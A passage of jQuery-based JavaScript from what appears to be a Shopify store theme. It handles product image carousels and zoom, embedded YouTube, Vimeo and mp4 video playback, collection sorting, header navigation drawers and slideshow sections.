                if (videoTypes.indexOf('youtube') > -1) {
                    if (!theme.config.youTubeReady) {
                        window.loadYouTube();
                        jQuery('body').on('youTubeReady' + this.settings.namespace, function() {
                            this.loadYoutubeVideos($productVideos);
                        }.bind(this));
                    } else {
                        this.loadYoutubeVideos($productVideos);
                    }
                }

                // Load Vimeo API if not already loaded
                if (videoTypes.indexOf('vimeo') > -1) {
                    if (!vimeoReady) {
                        window.loadVimeo();
                        jQuery('body').on('vimeoReady' + this.settings.namespace, function() {
                            this.loadVimeoVideos($productVideos);
                        }.bind(this))
                    } else {
                        this.loadVimeoVideos($productVideos);
                    }
                }

                // Add mp4 video players
                if (videoTypes.indexOf('mp4') > -1) {
                    this.loadMp4Videos($productVideos);
                }

                return videoTypes;
            },

            loadMp4Videos: function($videos) {
                $videos.each(function() {
                    var $el = jQuery(this);
                    if ($el.data('video-type') != 'mp4') {
                        return;
                    }

                    var id = $el.attr('id');
                    var videoId = $el.data('video-id');

                    videos[this.id] = {
                        type: 'mp4',
                        divId: id,
                        style: $el.data('video-style')
                    };
                });
            },

            loadVimeoVideos: function($videos) {
                $videos.each(function() {
                    var $el = jQuery(this);
                    if ($el.data('video-type') != 'vimeo') {
                        return;
                    }

                    var id = $el.attr('id');
                    var videoId = $el.data('video-id');

                    videos[this.id] = {
                        type: 'vimeo',
                        divId: id,
                        id: videoId,
                        style: $el.data('video-style'),
                        width: $el.data('video-width'),
                        height: $el.data('video-height')
                    };
                });

                // Create a new player for each Vimeo video
                for (var key in videos) {
                    if (videos[key].type != 'vimeo') {
                        continue;
                    }

                    var args = $.extend({}, vimeoVideoOptions, videos[key]);
                    vimeoPlayers[key] = new Vimeo.Player(videos[key].divId, args);
                }

                vimeoReady = true;
            },

            autoplayVimeoVideo: function(id) {
                // Do not autoplay on mobile though
                if (!theme.config.bpSmall) {
                    this.requestToPlayVimeoVideo(id);
                } else {
                    // Set as loaded on mobile so you can see the image
                    var $player = jQuery('#' + id);
                    setParentAsLoaded($player);
                }
            },

            requestToPlayVimeoVideo: function(id) {
                // The slider may initialize and attempt to play the video before
                // the API is even ready, because it sucks.

                var $player = jQuery('#' + id);
                setParentAsLoading($player);

                if (!vimeoReady) {
                    // Wait for the trigger, then play it
                    jQuery('body').on('vimeoReady' + this.settings.namespace, function() {
                        this.playVimeoVideo(id);
                    }.bind(this))
                    return;
                }

                this.playVimeoVideo(id);
            },

            playVimeoVideo: function(id) {
                vimeoPlayers[id].play();

                if (videos[id].style === 'muted') {
                    vimeoPlayers[id].setVolume(0);
                }

                var $player = jQuery('#' + id);
                setParentAsLoaded($player);
            },

            stopVimeoVideo: function(id) {
                if (!theme.config.vimeoReady) {
                    return;
                }

                if (id) {
                    vimeoPlayers[id].pause();
                } else {
                    for (key in vimeoPlayers) {
                        if (typeof vimeoPlayers[key].pause === 'function') {
                            vimeoPlayers[key].pause();
                        }
                    }
                }
            },

            loadYoutubeVideos: function($videos) {
                $videos.each(function() {
                    var $el = jQuery(this);
                    if ($el.data('video-type') != 'youtube') {
                        return;
                    }

                    var id = $el.attr('id');
                    var videoId = $el.data('youtube-id');

                    videos[this.id] = {
                        type: 'youtube',
                        id: id,
                        videoId: videoId,
                        style: $el.data('video-style'),
                        width: $el.data('video-width'),
                        height: $el.data('video-height'),
                        attemptedToPlay: false
                    };
                });

                // Create a player for each YouTube video
                for (var key in videos) {
                    if (videos[key].type === 'youtube') {
                        if (videos.hasOwnProperty(key)) {
                            var args = $.extend({}, youtubeVideoOptions, videos[key]);

                            if (args.style === 'muted') {
                                // default youtubeVideoOptions, no need to change anything
                            } else {
                                args.playerVars.controls = 1;
                                args.playerVars.autoplay = 0;
                            }

                            youtubePlayers[key] = new YT.Player(key, args);
                        }
                    }
                }

                youtubeReady = true;
            },

            requestToPlayYoutubeVideo: function(id, forcePlay) {
                if (!theme.config.youTubeReady) {
                    return;
                }

                var $player = jQuery('#' + id);
                setParentAsLoading($player);

                // If video is requested too soon, player might not be ready.
                // Set arbitrary timeout to request it again in a second
                if (typeof youtubePlayers[id].playVideo != 'function') {
                    var o = this;
                    setTimeout(function() {
                        o.playYoutubeVideo(id, forcePlay);
                    }, 1000);
                    return;
                }

                this.playYoutubeVideo(id, forcePlay);
            },

            playYoutubeVideo: function (id, forcePlay) {
                var $player = jQuery('#' + id);
                setParentAsLoaded($player);
                if (typeof youtubePlayers[id].playVideo === 'function') {
                    youtubePlayers[id].playVideo();
                }

                // forcePlay is sent as true from beforeSlideChange so the visibility
                // check isn't fooled by the next slide positioning
                if (!forcePlay) {
                    initCheckVisibility(id);
                }
            },

            stopYoutubeVideo: function(id) {
                if (!theme.config.youTubeReady) {
                    return;
                }

                if (id && youtubePlayers[id]) {
                    if (typeof youtubePlayers[id].pauseVideo === 'function') {
                        youtubePlayers[id].pauseVideo();
                    }
                    jQuery(window).off('scroll.' + id);
                } else {
                    for (key in youtubePlayers) {
                        if (typeof youtubePlayers[key].pauseVideo === 'function') {
                            youtubePlayers[key].pauseVideo();
                            jQuery(window).off('scroll.' + key);
                        }
                    }
                }
            },

            playMp4Video: function(id) {
                var $player = jQuery('#' + id);
                setParentAsLoaded($player);

                $player[0].play();
            },

            stopMp4Video: function(id) {
                if (id) {
                    jQuery('#' + id)[0].pause();
                } else {
                    // loop through all mp4 videos to stop them
                    for (var key in videos) {
                        if (videos[key].type === 'mp4') {
                            var player = jQuery('#' + videos[key].divId)[0];
                            if (typeof player.pause === 'function') {
                                player.pause();
                            }
                        }
                    }
                }
            },

            // Init zoom for each image in the main carousel
            initZoom: function($image) {
                var largeImage = $image.parent().data('zoom-size');
                $image.parent()
                    .on('click', function(evt) {
                        evt.preventDefault();
                    })
                    .zoom({
                        on: 'click',
                        url: largeImage,
                        duration: 180,
                        touch: false,
                        onZoomIn: function() {
                            jQuery(this).addClass('photo-zoom-linked');
                        },
                        onZoomOut: function() {
                            jQuery(this).removeClass('photo-zoom-linked');
                        }
                    });
            },

            createImageCarousels: function() {
                // Init zoom since the carousel won't do it
                if (this.settings.zoom) {
                    this.initZoom(jQuery(this.selectors.productImageMain).find(selectors.zoomImage));
                }

                if (!this.$thumbSlider.length || jQuery(this.selectors.photoThumbs).length < 2) {
                    // Single product image. Init video if it exists
                    var $video = jQuery(this.selectors.productImageMain).find(selectors.productVideo);
                    if ($video.length) {
                        this.initVideo($video);
                    }
                    return;
                }

                this.settings.hasMultipleImages = true;

                // Set starting slide (for both sliders)
                var $activeSlide = this.$mainSlider.find('.starting-slide');
                var startIndex = this._slideIndex($activeSlide);

                // Lame way to prevent duplicate event listeners
                this.$mainSlider.off('init');
                this.$mainSlider.off('beforeChange');
                this.$mainSlider.on('init', this.mainSlideInit.bind(this));
                this.$mainSlider.on('beforeChange', this.beforeSlideChange.bind(this));

                // Default (mobile) slider settings
                this.mainSliderArgs = {
                    infinite: true,
                    arrows: false,
                    dots: true,
                    adaptiveHeight: true,
                    initialSlide: startIndex
                };

                this.thumbSliderArgs = {
                    initialSlide: startIndex
                };

                // Init sliders normally
                var sliderArgs = this.setSliderArgs();
                this.initSliders(sliderArgs);

                // Re-init slider when a breakpoint is hit
                jQuery('body').on('matchSmall matchLarge', function() {
                    var sliderArgs = this.setSliderArgs();
                    this.initSliders(sliderArgs);
                }.bind(this));

                // Too many thumbnails can cause the AOS calculations to be off
                // so refresh that when the slider is ready
                if (AOS) {
                    AOS.refresh();
                }
            },

            initSliders: function(args) {
                this.destroyImageCarousels();

                this.$mainSlider.slick(args.main);
                if (!theme.config.bpSmall) {
                    this.$thumbSlider.slick(args.thumbs);
                    this.settings.slickThumbInitialized = true;
                }

                this.settings.slickMainInitialized = true;
            },

            setSliderArgs: function() {
                var args = {};
                var thumbnailsVertical = this.$thumbSlider.data('position') === 'beside' ? true : false;

                if (theme.config.bpSmall) {
                    args.main = this.mainSliderArgs;
                    args.thumbs = this.thumbSliderArgs;
                } else {
                    args.main = $.extend({}, this.mainSliderArgs, {
                        asNavFor: this.selectors.thumbSlider,
                        adaptiveHeight: thumbnailsVertical ? false : true,
                        dots: false,
                        infinite: false,
                        fade: true
                    });
                    args.thumbs = $.extend({}, this.thumbSliderArgs, {
                        asNavFor: this.selectors.mainSlider,
                        slidesToShow: thumbnailsVertical ? 3 : 5,
                        slidesToScroll: 1,
                        arrows: false,
                        dots: false,
                        vertical: thumbnailsVertical,
                        verticalSwiping: thumbnailsVertical,
                        focusOnSelect: true,
                        infinite: false,
                        customHeightMatching: thumbnailsVertical,
                        customSlideAdvancement: true
                    });
                }

                return args;
            },

            destroyImageCarousels: function() {
                if (this.$mainSlider && this.settings.slickMainInitialized) {
                    this.$mainSlider.slick('unslick');
                    this.settings.slickMainInitialized = false;
                }

                if (this.$thumbSlider && this.settings.slickThumbInitialized) {
                    this.$thumbSlider.slick('unslick');
                    this.settings.slickThumbInitialized = false;
                }
            },

            mainSlideInit: function(event, slick) {
                var $slider = slick.$slider;
                var $currentSlide = $slider.find(selectors.currentSlide);
                var $video = $currentSlide.find(selectors.productVideo);

                if (!$video.length) {
                    return;
                }

                this.initVideo($video);
            },

            initVideo: function($video) {
                var videoType = $video.data('video-type');
                var divId = $video.attr('id');

                if (videoType === 'mp4' && videos[divId].style === 'muted') {
                    this.playMp4Video(divId);
                }

                if (videoType === 'youtube') {
                    if (youtubeReady && videos[divId].style === 'muted') {
                        this.requestToPlayYoutubeVideo(divId);
                    }
                }

                if (videoType === 'vimeo') {
                    if (vimeoReady) {
                        this.playOrShowVimeo(divId);
                    } else {
                        jQuery('body').on('vimeoReady' + this.settings.namespace, function() {
                            this.playOrShowVimeo(divId);
                        }.bind(this))
                    }
                }

                // Hacky way to trigger resetting the slider layout in modals
                if (this.inModal) {
                    this.resizeSlides();
                }
            },

            playOrShowVimeo: function(id) {
                if (videos[id] && videos[id].style === 'muted') {
                    this.autoplayVimeoVideo(id);
                } else if (videos[id] && videos[id].style === 'unmuted') {
                    setParentAsLoaded(jQuery('#' + id));
                }
            },

            getVideoType: function($video) {
                return $video.data('video-type');
            },

            getVideoId: function($video) {
                return $video.attr('id');
            },

            beforeSlideChange: function(event, slick, currentSlide, nextSlide) {
                var $slider = slick.$slider;
                var $currentSlide = $slider.find(selectors.currentSlide);
                var $prevVideo = $currentSlide.find('.product__video');
                var $nextSlide = $slider.find('.slick-slide[data-slick-index="' + nextSlide + '"]');
                var $nextVideo = $nextSlide.find('.product__video');

                // Pause any existing slide video
                if (currentSlide !== nextSlide && $prevVideo.length) {
                    var prevVideoType = this.getVideoType($prevVideo);
                    var prevVideoId = this.getVideoId($prevVideo);

                    if (prevVideoId) {
                        if (prevVideoType === 'youtube') {
                            this.stopYoutubeVideo(prevVideoId);
                        }

                        if (prevVideoType === 'mp4') {
                            this.stopMp4Video(prevVideoId);
                        }

                        if (prevVideoType === 'vimeo') {
                            this.stopVimeoVideo(prevVideoId);
                        }
                    }
                }

                // Prep next slide video
                if ($nextVideo.length) {
                    var nextVideoType = this.getVideoType($nextVideo);
                    var nextVideoId = this.getVideoId($nextVideo);

                    // Prep Vimeo with a backup in case the API isn't ready
                    if (nextVideoId && nextVideoType === 'vimeo') {
                        if (vimeoReady) {
                            if (videos[nextVideoId] && videos[nextVideoId].style === 'muted') {
                                this.autoplayVimeoVideo(nextVideoId);
                            }
                        } else {
                            jQuery('body').on('vimeoReady' + this.settings.namespace, function() {
                                if (videos[nextVideoId] && videos[nextVideoId].style === 'muted') {
                                    this.autoplayVimeoVideo(nextVideoId);
                                }
                            }.bind(this))
                        }
                    }

                    // Prep YouTube with a backup in case API isn't ready
                    if (nextVideoId && nextVideoType === 'youtube') {
                        if (youtubeReady) {
                            if (videos[nextVideoId] && videos[nextVideoId].style === 'muted') {
                                this.requestToPlayYoutubeVideo(nextVideoId, true);
                            }
                        } else {
                            jQuery('body').on('youTubeReady' + this.settings.namespace, function() {
                                if (videos[nextVideoId] && videos[nextVideoId].style === 'muted') {
                                    this.requestToPlayYoutubeVideo(nextVideoId, true);
                                }
                            }.bind(this))
                        }
                    }

                    // Autoplay muted MP4 videos
                    if (nextVideoId && videos[nextVideoId] && videos[nextVideoId].style === 'muted') {
                        if (nextVideoType === 'mp4') {
                            this.playMp4Video(nextVideoId);
                        }
                    }

                    // Set unmuted videos to loaded state
                    if (nextVideoId && videos[nextVideoId] && videos[nextVideoId].style != 'muted') {
                        setParentAsLoaded(jQuery('#' + nextVideoId));
                    }
                }

                // Layload zoom image
                if (this.settings.zoom) {
                    if ($nextSlide.hasClass(classes.zoomInit)) {
                        return;
                    }
                    var $image = $nextSlide.addClass(classes.zoomInit).find('img').addClass('lazyload');
                    this.initZoom($image);
                }
            },

            resizeSlides: function() {
                if (!this.settings.hasMultipleImages) {
                    return;
                }

                jQuery(window).trigger('resize');
                setTimeout(function() {
                    this.$mainSlider.slick('setPosition');
                    this.$thumbSlider.slick('setPosition');
                }.bind(this), 500); // same timing as modal open transition
            },

            _slideIndex: function($el) {
                return $el.data('index');
            },

            // Ajax cart and qty
            initQtySelector: function() {
                this.$container.find('.js-qty').each(function() {
                    new theme.QtySelector(jQuery(this), {
                        namespace: '.product'
                    });
                });
            },

            initAjaxProductForm: function() {
                if (theme.settings.cartType === 'drawer') {
                    new theme.AjaxProduct(jQuery(this.selectors.formContainer));
                }
            },

            openModalProduct: function() {
                if (!this.settings.modalInit) {
                    var $formHolder = jQuery(this.selectors.modalFormHolder);
                    var url = $formHolder.data('url');

                    $formHolder.load(url + ' #AddToCartForm-' + this.sectionId, function() {
                        $formHolder.addClass('is-active');
                        this.formSetup();
                        if (Shopify.PaymentButton) {
                            Shopify.PaymentButton.init();
                        }
                    }.bind(this));

                    this.productSetup();
                    this.loadModalContent();
                    this.createImageCarousels();
                    this.settings.modalInit = true;
                }

                this.resizeSlides();

                // Add product id to recently viewed array
                this.addIdToRecentlyViewed();
            },

            closeModalProduct: function() {
                this.stopYoutubeVideo();
                this.stopVimeoVideo();
                this.stopMp4Video();
            },

            loadModalContent: function() {
                // Load videos if they exist
                var videoTypes = this.checkIfVideos();

                // Lazyload mp4 videos similar to images
                if (videoTypes && videoTypes.indexOf('mp4') > -1) {
                    this.$modal.find('.product__video[data-video-type="mp4"]').each(function(i, video) {
                        var $el = jQuery(video);
                        var src = $el.data('video-src');
                        var source = document.createElement('source');
                        source.setAttribute('src', src);
                        $el.append(source);
                    }.bind(this));
                }
            },

            onUnload: function() {
                this.$container.off(this.settings.namespace);
                jQuery('body').off(this.settings.namespace);
                this.destroyImageCarousels();
            }
        });

        return Product;
    })();

    theme.CollectionHeader = (function() {

        var selectors = {
            hero: '.collection-hero',
            parallaxContainer: '.parallax-container'
        };

        function CollectionHeader(container) {
            var $container = jQuery(container);
            this.namespace = '.collection-header';

            var $heroImageContainer = $container.find(selectors.hero);
            if ($heroImageContainer.length) {
                if ($container.data('parallax')) {
                    var $parallaxContainer = $container.find(selectors.parallaxContainer);
                    var args = {
                        namespace: this.namespace
                    };
                    theme.parallaxSections[this.namespace] = new theme.Parallax($parallaxContainer, args);
                }
            }
        }

        CollectionHeader.prototype = $.extend({}, CollectionHeader.prototype, {
            onUnload: function() {
                theme.parallaxSections[this.namespace].destroy();
                delete theme.parallaxSections[this.namespace];
            }
        });

        return CollectionHeader;
    })();

    theme.CollectionSidebar = (function() {
        var drawerStyle = false;

        function CollectionSidebar(container) {
            this.$container = jQuery(container);
            this.init();
        }

        CollectionSidebar.prototype = $.extend({}, CollectionSidebar.prototype, {
            init: function() {
                // Force close the drawer if it exists
                this.onUnload();

                drawerStyle = this.$container.data('style') === 'drawer';
                theme.FilterDrawer = new theme.Drawers('FilterDrawer', 'collection-filters', true);
            },

            forceReload: function() {
                this.init();
            },

            onSelect: function() {
                if (theme.FilterDrawer) {
                    if (!drawerStyle) {
                        theme.FilterDrawer.close();
                        return;
                    }

                    if (drawerStyle || theme.config.bpSmall) {
                        theme.FilterDrawer.open();
                    }
                }
            },

            onDeselect: function() {
                if (theme.FilterDrawer) {
                    theme.FilterDrawer.close();
                }
            },

            onUnload: function() {
                if (theme.FilterDrawer) {
                    theme.FilterDrawer.close();
                }
            }
        });

        return CollectionSidebar;
    })();

    theme.Collection = (function() {

        var selectors = {
            colorSwatchImage: '.grid-product__color-image',
            colorSwatch: '.color-swatch--with-image'
        };

        function Collection(container) {
            this.container = container;
            this.sectionId = jQuery(container).attr('data-section-id');
            this.namespace = '.collection-' + this.sectionId;

            this.init();
        }

        Collection.prototype = $.extend({}, Collection.prototype, {
            init: function() {
                // init is called on load and when tags are selected
                this.$container = jQuery(this.container);
                var sectionId = this.sectionId = this.$container.attr('data-section-id');
                this.namespace = '.collection-' + sectionId;

                this.sortBy();
                this.colorSwatchHovering();

                theme.reinitSection('collection-sidebar');
            },

            sortBy: function() {
                var $sortBy = jQuery('#SortBy');

                if (!$sortBy.length) {
                    return;
                }

                $sortBy.on('change' + this.namespace, function() {
                    location.href = '?sort_by=' + jQuery(this).val();
                });
            },

            colorSwatchHovering: function() {
                var $colorImage = jQuery(selectors.colorSwatchImage);
                if (!$colorImage.length) {
                    return;
                }

                var $swatches = this.$container.find(selectors.colorSwatch);

                $swatches.on({
                    mouseenter: function (evt) {
                        $el = jQuery(evt.currentTarget);
                        var id = $el.data('variant-id');
                        var image = $el.data('variant-image');
                        jQuery('.grid-product__color-image--' + id)
                            .css('background-image', 'url(' + image + ')')
                            .addClass('is-active');
                    },
                    mouseleave: function (evt) {
                        $el = jQuery(evt.currentTarget);
                        var id = $el.data('variant-id');
                        jQuery('.grid-product__color-image--' + id).removeClass('is-active');
                    }
                });
            },

            forceReload: function() {
                this.onUnload();
                this.init();
            },

            onUnload: function() {
                jQuery(window).off(this.namespace);
                this.$container.off(this.namespace);
                jQuery(selectors.colorSwatch).off(this.namespace);
            }
        });

        return Collection;
    })();

    theme.HeaderSection = (function() {

        var selectors = {
            drawer: '#NavDrawer',
            mobileSubNavToggle: '.mobile-nav__toggle-btn',
            hasSublist: '.mobile-nav__has-sublist'
        };

        var classes = {
            navExpanded: 'mobile-nav--expanded'
        };

        function Header(container) {
            var $container = this.$container = jQuery(container);
            var sectionId = this.sectionId = $container.attr('data-section-id');

            // Reload any slideshow if when the header is reloaded to make sure the
            // sticky header works as expected
            theme.reinitSection('slideshow-section');

            theme.currencySwitcher.init()
            this.initDrawers();
            theme.headerNav.init();
            theme.announcementBar.init();

            // Set a timer to resize the header in case the logo changes size
            if (Shopify.designMode) {
                setTimeout(function() {
                    jQuery('body').trigger('resize');
                }, 500);
            }
        }

        Header.prototype = $.extend({}, Header.prototype, {
            initDrawers: function() {
                theme.NavDrawer = new theme.Drawers('NavDrawer', 'nav');
                if (theme.settings.cartType === 'drawer') {
                    new theme.CartDrawer();
                }

                this.drawerMenuButtons();
            },

            drawerMenuButtons: function() {
                jQuery(selectors.drawer).find('.js-drawer-close').on('click', function(evt){
                    evt.preventDefault();
                    theme.NavDrawer.close();
                });

                var $mobileSubNavToggle = jQuery(selectors.mobileSubNavToggle);

                $mobileSubNavToggle.attr('aria-expanded', 'false');
                $mobileSubNavToggle.each(function (i, el) {
                    var $el = jQuery(el);
                    $el.attr('aria-controls', $el.attr('data-aria-controls'));
                });

                $mobileSubNavToggle.on('click', function() {
                    var $el = jQuery(this);
                    var currentlyExpanded = $el.attr('aria-expanded');
                    var toggleState = false;

                    // Updated aria-expanded value based on state pre-click
                    if (currentlyExpanded === 'true') {
                        $el.attr('aria-expanded', 'false');
                    } else {
                        $el.attr('aria-expanded', 'true');
                        toggleState = true;
                    }

                    // Toggle class that expands/collapses sublist
                    $el.closest(selectors.hasSublist).toggleClass(classes.navExpanded, toggleState);
                });
            },

            onBlockSelect: function(evt) {
                theme.announcementBar.onBlockSelect(evt.detail.blockId);
            },

            onDeselect: function() {
                theme.announcementBar.onBlockDeselect();
            },

            onUnload: function() {
                theme.NavDrawer.close();
                theme.headerNav.unload();
                theme.announcementBar.unload();
            }
        });

        return Header;

    })();

    theme.FeaturedContentSection = (function() {

        function FeaturedContent() {
            jQuery('.rte').find('a:not(:has(img))').addClass('text-link');
        }

        return FeaturedContent;
    })();

    theme.slideshows = {};

    theme.SlideshowSection = (function() {

        var selectors = {
            parallaxContainer: '.parallax-container'
        };

        function SlideshowSection(container) {
            var $container = this.$container = jQuery(container);
            var $section = $container.parent();
            var sectionId = $container.attr('data-section-id');
            var slideshow = this.slideshow = '#Slideshow-' + sectionId;
            this.namespace = '.' + sectionId;

            var $imageContainer = jQuery(container).find('.hero');
            if ($imageContainer.length) {
                theme.loadImageSection($imageContainer);
            }

            this.init();

            if ($container.data('parallax')) {
                var args = {
                    namespace: this.namespace
                };
                theme.parallaxSections[this.namespace] = new theme.Parallax($container.find(selectors.parallaxContainer), args);
            }
        }

        SlideshowSection.prototype = $.extend({}, SlideshowSection.prototype, {
            init: function() {
                // Prevent slideshows from initializing on top of themselves
                this.onUnload();

                var $slideshow = jQuery(this.slideshow);
                var args = {
                    autoplay: $slideshow.data('autoplay'),
                    arrows: $slideshow.data('arrows'),
                    dots: $slideshow.data('dots'),
                    fade: true,
                    speed: 500 // same as $slideshowImageAnimationSpeed in CSS
                };

                theme.slideshows[this.slideshow] = new theme.Slideshow(this.slideshow, args);
            },

            forceReload: function() {
                this.init();
            },

            onUnload: function() {
                if (theme.parallaxSections[this.namespace]) {
                    theme.parallaxSections[this.namespace].destroy();
                    delete theme.parallaxSections[this.namespace];
                }
                if (theme.slideshows[this.slideshow]) {
                    theme.slideshows[this.slideshow].destroy();
                    delete theme.slideshows[this.slideshow];
                }
            },

            onSelect: function() {
                jQuery(this.slideshow).slick('slickPause');
            },

            onDeselect: function() {
                jQuery(this.slideshow).slick('slickPlay');
            },

            onBlockSelect: function(evt) {
                var $slideshow = jQuery(this.slideshow);

                // Ignore the cloned version
                var $slide = jQuery('.slideshow__slide--' + evt.detail.blockId + ':not(.slick-cloned)');
                var slideIndex = $slide.data('slick-index');

                // Go to selected slide, pause autoplay
                $slideshow.slick('slickGoTo', slideIndex).slick('slickPause');
            },

            onBlockDeselect: function() {
                jQuery(this.slideshow).slick('slickPlay');
            }
        });

        return SlideshowSection;
    })();

    theme.VideoSection = (function() {
        var youtubeReady;
        var videos = [];
        var youtubePlayers = [];
        var youtubeVideoOptions = {
            width: 1280,
            height: 720,
            playerVars: {
                autohide: 0,
                branding: 0,
                cc_load_policy: 0,
                controls: 0,
                fs: 0,
                iv_load_policy: 3,
                modestbranding: 1,
                playsinline: 1,
                quality: 'hd720',
                rel: 0,
                showinfo: 0,
                wmode: 'opaque'
            },
            events: {
                onReady: onVideoPlayerReady,
                onStateChange: onVideoStateChange
            }
        };

        var vimeoReady = false;
        var vimeoVideoOptions = {
            byline: false,
            title: false,
            portrait: false,
            loop: true
        };

        var selectors = {
            videoParent: '.video-parent-section'
        };

        var classes = {
            loading: 'loading',
            loaded: 'loaded',
            interactable: 'video-interactable'
        };

        function videoSection(container) {
            var $container = this.$container = jQuery(container);
            var sectionId = this.sectionId = $container.attr('data-section-id');
            var youtubePlayerId = this.youtubePlayerId = 'YouTubeVideo-' + this.sectionId;
            this.namespace = '.' + youtubePlayerId;
            var vimeoPlayerId = this.vimeoPlayerId = 'Vimeo-' + this.sectionId;
            var $vimeoTrigger = this.$vimeoTrigger = jQuery('#VimeoTrigger-' + this.sectionId);
            var mp4Video = 'Mp4Video-' + this.sectionId;

            var $youtubeDiv = jQuery('#' + youtubePlayerId);
            var $vimeoDiv = jQuery('#' + vimeoPlayerId);
            var $mp4Div = jQuery('#' + mp4Video);

            this.vimeoPlayer = [];

            if ($youtubeDiv.length) {
                this.youtubeVideoId = $youtubeDiv.data('video-id');
                this.initYoutubeVideo();
            }

            if ($vimeoDiv.length) {
                this.vimeoVideoId = $vimeoDiv.data('video-id');
                this.initVimeoVideo();
            }

            if ($mp4Div.length) {
                setParentAsLoaded($mp4Div);

                startMp4Playback(mp4Video).then(function() {
                    // Video played as expected, don't do anything
                }).catch(function(error) {
                    // Video cannot be played with autoplay, so let
                    // user interact with video element itself
                    setVideoToBeInteractedWith($mp4Div);
                })
            }
        }

        function startMp4Playback(mp4Video) {
            return document.querySelector('#' + mp4Video).play();
        }

        function onVideoPlayerReady(evt) {
            var $player = evt.target.h ? jQuery(evt.target.h) : jQuery(evt.target.h);

            // FIX BY SM
            var videoId = evt.target.getVideoData().video_id;
            var $player = $('[data-video-id="'+videoId+'"]');
            if (!$player.length) { $player = $('[data-youtube-id="'+videoId+'"]') }
            // END FIX BY SM

            var playerId = $player.attr('id');
            youtubePlayers[playerId] = evt.target; // update stored player
            var player = youtubePlayers[playerId];

            setParentAsLoading($player);

            youtubePlayers[playerId].mute();

            // Remove from tabindex because YouTube iframes are annoying and you can focus
            // on the YouTube logo and it breaks
            $player.attr('tabindex', '-1');

            // Add out of view pausing
            videoVisibilityCheck(playerId);
            jQuery(window).on('scroll.' + playerId, {id: playerId}, $.throttle(150, videoVisibilityCheck));
        }

        function videoVisibilityCheck(id) {
            var playerId;

            if (typeof id === 'string') {
                playerId = id;
            } else {
                // Data comes in as part of the scroll event
                playerId = id.data ? id.data.id : false;
            }

            if (playerId) {
                if (theme.isElementVisible(jQuery('#' + playerId))) {
                    playVisibleVideo(playerId);
                } else {
                    pauseHiddenVideo(playerId);
                }
            }
        }

        function playVisibleVideo(id) {
            if (youtubePlayers[id] && typeof youtubePlayers[id].playVideo === 'function') {
                youtubePlayers[id].playVideo();
            }
        }

        function pauseHiddenVideo(id) {
            if (youtubePlayers[id] && typeof youtubePlayers[id].pauseVideo === 'function') {
                youtubePlayers[id].pauseVideo();
            }
        }

        function onVideoStateChange(evt) {
            var $player = evt.target.h ? jQuery(evt.target.h) : jQuery(evt.target.h);

            // FIX BY SM
            var videoId = evt.target.getVideoData().video_id;
            var $player = $('[data-video-id="'+videoId+'"]');
            if (!$player.length) { $player = $('[data-youtube-id="'+videoId+'"]') }
            // END FIX BY SM

            var playerId = $player.attr('id');
            var player = youtubePlayers[playerId];

            switch (evt.data) {
                case -1: // unstarted
                    // Handle low power state on iOS by checking if
                    // video is reset to unplayed after attempting to buffer
                    if (videos[playerId].attemptedToPlay) {
                        setParentAsLoaded($player);
                        setVideoToBeInteractedWith($player);
                    }
                    break;
                case 0: // ended
                    player.playVideo();
                    break;
                case 1: // playing
                    setParentAsLoaded($player);
                    break;
                case 3: // buffering
                    videos[playerId].attemptedToPlay = true;
                    break;
            }
        }

        function setParentAsLoading($el) {
            $el
                .closest(selectors.videoParent)
                .addClass(classes.loading);
        }

        function setParentAsLoaded($el) {
            $el
                .closest(selectors.videoParent)
                .removeClass(classes.loading)
                .addClass(classes.loaded);
        }

        function setVideoToBeInteractedWith($el) {
            $el
                .closest(selectors.videoParent)
                .addClass(classes.interactable);
        }

        videoSection.prototype = $.extend({}, videoSection.prototype, {
            initYoutubeVideo: function() {
                videos[this.youtubePlayerId] = {
                    id: this.youtubePlayerId,
                    videoId: this.youtubeVideoId,
                    type: 'youtube',
                    attemptedToPlay: false
                };

                if (!youtubeReady) {
                    window.loadYouTube();
                    jQuery('body').on('youTubeReady' + this.namespace, this.loadYoutubeVideo.bind(this));
                } else {
                    this.loadYoutubeVideo();
                }
            },

            loadYoutubeVideo: function() {
                var args = $.extend({}, youtubeVideoOptions, videos[this.youtubePlayerId]);
                args.playerVars.controls = 0;
                youtubePlayers[this.youtubePlayerId] = new YT.Player(this.youtubePlayerId, args);

                youtubeReady = true;
            },

            initVimeoVideo: function() {
                videos[this.vimeoPlayerId] = {
                    divId: this.vimeoPlayerId,
                    id: this.vimeoVideoId,
                    type: 'vimeo'
                };

                var $player = jQuery('#' + this.vimeoPlayerId);
                setParentAsLoading($player);

                // Button to play video on mobile
                this.$vimeoTrigger.on('click', + this.namespace, function(evt) {
                    // jQuery(evt.currentTarget).addClass('hide');
                    this.requestToPlayVimeoVideo(this.vimeoPlayerId);
                }.bind(this));

                if (!vimeoReady) {
                    window.loadVimeo();
                    jQuery('body').on('vimeoReady' + this.namespace, this.loadVimeoVideo.bind(this));
                } else {
                    this.loadVimeoVideo();
                }
            },

            loadVimeoVideo: function() {
                var args = $.extend({}, vimeoVideoOptions, videos[this.vimeoPlayerId]);
                this.vimeoPlayer[this.vimeoPlayerId] = new Vimeo.Player(videos[this.vimeoPlayerId].divId, args);

                vimeoReady = true;

                // Only autoplay on larger screens
                if (!theme.config.bpSmall) {
                    this.requestToPlayVimeoVideo(this.vimeoPlayerId);
                } else {
                    var $player = jQuery('#' + this.vimeoPlayerId);
                    setParentAsLoaded($player);
                }
            },

            requestToPlayVimeoVideo: function(id) {
                // The slider may initialize and attempt to play the video before
                // the API is even ready, because it sucks.

                if (!vimeoReady) {
                    // Wait for the trigger, then play it
                    jQuery('body').on('vimeoReady' + this.namespace, function() {
                        this.playVimeoVideo(id);
                    }.bind(this))
                    return;
                }

                this.playVimeoVideo(id);
            },

            playVimeoVideo: function(id) {
                this.vimeoPlayer[id].play();
                this.vimeoPlayer[id].setVolume(0);

                var $player = jQuery('#' + id);
                setParentAsLoaded($player);
            },

            onUnload: function(evt) {
                var sectionId = evt.target.id.replace('shopify-section-', '');
                var playerId = 'YouTubeVideo-' + sectionId;
                youtubePlayers[playerId].destroy();
                jQuery(window).off('scroll' + this.namespace);
                jQuery('body').off('vimeoReady' + this.namespace);
            }
        });

        return videoSection;
    })();

    theme.BackgroundImage = (function() {

        var selectors = {
            parallaxContainer: '.parallax-container'
        };

        function backgroundImage(container) {
            var $container = jQuery(container);
            var sectionId = $container.attr('data-section-id');
            this.namespace = '.' + sectionId;

            if (!$container.length) {
                return;
            }

            if ($container.data('parallax')) {
                var $parallaxContainer = $container.find(selectors.parallaxContainer);
                var args = {
                    namespace: this.namespace,
                    desktopOnly: true
                };

